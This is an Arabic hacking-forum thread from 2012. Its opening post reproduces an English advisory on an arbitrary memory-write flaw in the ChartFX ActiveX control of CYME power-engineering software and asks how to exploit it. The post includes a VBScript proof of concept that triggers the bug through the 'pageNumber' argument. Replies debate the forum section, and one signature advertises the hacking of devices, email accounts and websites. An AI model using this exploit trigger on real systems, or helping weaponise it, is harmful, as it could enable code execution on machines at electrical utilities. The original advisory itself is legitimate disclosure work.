ثغرة جديدة تاريح الثغرة 4/10/2012

ثغرة جديدة تاريح الثغرة 4/10/2012


النتائج 1 إلى 9 من 9

الموضوع: ثغرة جديدة تاريح الثغرة 4/10/2012

  1. #1

    افتراضي ثغرة جديدة تاريح الثغرة 4/10/2012

    شباب بدى تفسير كيفية استغلال هاى الثغرة وللعم هى تاريخها 4/10/2012
    __________________________________________________ __________________________________


    Application: CYME Power Engineering Software

    Platforms: Windows
    Version: CYME version 5.0.12.663.

    Secunia: SA48430

    {PRL}: 2012-29

    Author: Francis Provencher (Protek Research Lab's)

    Website: http://www.protekresearchlab.com/

    Twitter: @ProtekResearch


    ################################################## ###################################

    1) Introduction
    2) Report Timeline
    3) Technical details
    4) The Code


    ################################################## ###################################

    ===============
    1) Introduction
    ===============

    The CYME Power Engineering software is a suite of applications composed of a network editor, analysis
    modules and user-customizable model libraries from which you can choose to get the most powerful solution.

    The modules available comprise a variety of advanced applications and extensive libraries for either
    transmission/industrial or distribution power network analysis.

    (http://www.cyme.com/software/)

    This software is use by all major electrical production/distrubtion company
    http://www.cyme.com/company/clients/

    ################################################## ###################################

    ============================
    2) Report Timeline
    ============================

    2012-03-14 Vulnerability reported to Secunia
    2012-10-03 Publication of this advisory (180 Days)


    ################################################## ###################################

    ============================
    3) Technical details
    ============================
    The vulnerability is caused due to an indexing error in the "ShowPropertiesDialog()"
    method (ChartFX.ClientServer.Core.dll) of the ChartFX ActiveX Control. This can be
    exploited to write a single byte value to an arbitrary memory location via the
    "pageNumber" parameter. Successful exploitation may allow execution of arbitrary code.


    ################################################## ###################################

    ===========
    4) The Code
    ===========
    <object classid='clsid:E9DF30CA-4B30-4235-BF0C-7150F646606C' id='target' />
    <script language='vbscript'>
    targetFile = "C:\CYME\CYMDIST50TRIAL\ChartFX.ClientServer.Core. dll"
    prototype = "Sub ShowPropertiesDialog ( ByVal context As Variant , ByVal pageNumber As Long )"
    memberName = "ShowPropertiesDialog"
    progid = "Cfx62ClientServer.Chart"
    argCount = 2

    arg1="defaultV"
    arg2=2147483647

    target.ShowPropertiesDialog arg1 ,arg2

  2. #2

  3. #3

    افتراضي رد: ثغرة جديدة تاريح الثغرة 4/10/2012

    كفوؤو يالغالي بس آنت حاطط الموضوع بالقسم الخطأ مفروض كنت تحطه بقسم الثغرآت
    الياهو : [email protected]
    سكايبي : yahya.saddami
    فيس بوكي
    قناتي علي اليوتيوب
    صفحة حزب البعث العراقي

    اعلن استقالتي عن منتديات جيوش الهكرز وشكراً للناس المحترمه


  4. #4

    افتراضي رد: ثغرة جديدة تاريح الثغرة 4/10/2012

    ينقل للقسم المناسب

    بالتوفيق

    لا تترك صلاتك ابداً
    فهناك ألملايين تحت ألقبور يتمنون لو تعود بهم الحياة
    لـ يسجدو لو سجدة واحدة !



    اللهم صل وسلم وبارك على سيدنا محمد وعلى اله وصحبه اجمعين

    أستغفر الله العظيم الذي لا إله إلا هو الحي القيوم وأتوب إليه

  5. #5

    افتراضي رد: ثغرة جديدة تاريح الثغرة 4/10/2012

    على اساس ان دة قسم اية مثلا؟ مهو دة قسم الثغرات
    ههههههههه ممكن يكون قصدك احطو فى قسم المشاكل ممكن

  6. #6

    افتراضي رد: ثغرة جديدة تاريح الثغرة 4/10/2012

    بارك الله فيك

  7. #7

    افتراضي رد: ثغرة جديدة تاريح الثغرة 4/10/2012

    مشكؤؤؤر .. يعطيك العافية .. دمت بتالق
    إخترآق أجهزة _ إيميلات 100 %
    تشفير _ هيكس _ تلغيم 100 %
    اندكسات _ فرونت بيج 100 %
    إختراق مواقــع 30 %

    #
    تم إعتـزال إختراق الأجهزة والتشفير

    twitter : Ss_pc3

  8. #8

    افتراضي رد: ثغرة جديدة تاريح الثغرة 4/10/2012

    لا يالغالي انت كنت حاطه في قسم اختراق المواقع مو قسم الثغرات
    الياهو : [email protected]
    سكايبي : yahya.saddami
    فيس بوكي
    قناتي علي اليوتيوب
    صفحة حزب البعث العراقي

    اعلن استقالتي عن منتديات جيوش الهكرز وشكراً للناس المحترمه


  9. #9
    هكر مبتديء
    تاريخ التسجيل
    Oct 2012
    الدولة
    العراق /النجف الاشرف
    المشاركات
    12

    افتراضي رد: ثغرة جديدة تاريح الثغرة 4/10/2012

    الموضوع ما يفتح معي ؟ساعدوني

المواضيع المتشابهه

  1. ثغرة فيس بوك جديدة
    بواسطة قناص~الغلا في المنتدى قسم الثغرات
    مشاركات: 89
    آخر مشاركة: 04-23-2013, 07:49 AM
  2. ثغرة جديدة و سهلة حتى للمبتدئين
    بواسطة mawer في المنتدى قسم الثغرات
    مشاركات: 0
    آخر مشاركة: 08-14-2012, 04:10 PM
  3. ثغرة جديدة في FTP ('WinXP SP2 - Windows 7 SP1 / AbsoluteFTP 1.9.6 - 2.2.10.252')
    بواسطة BLACK ANGIL في المنتدى قسم الإختراق بالميتاسبلوت والإتصال العكسي
    مشاركات: 5
    آخر مشاركة: 05-29-2012, 06:57 AM
  4. ثغرة remote file inclusion +ثغرة جديدة +طريقة الإستغلال
    بواسطة millen!um في المنتدى قسم الثغرات
    مشاركات: 17
    آخر مشاركة: 01-29-2012, 12:11 AM
  5. ثغرة جديدة بمنتديات ASP Resources Forum
    بواسطة ninja.x في المنتدى منتدى إختراق المنتديات
    مشاركات: 0
    آخر مشاركة: 01-30-2011, 12:07 AM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •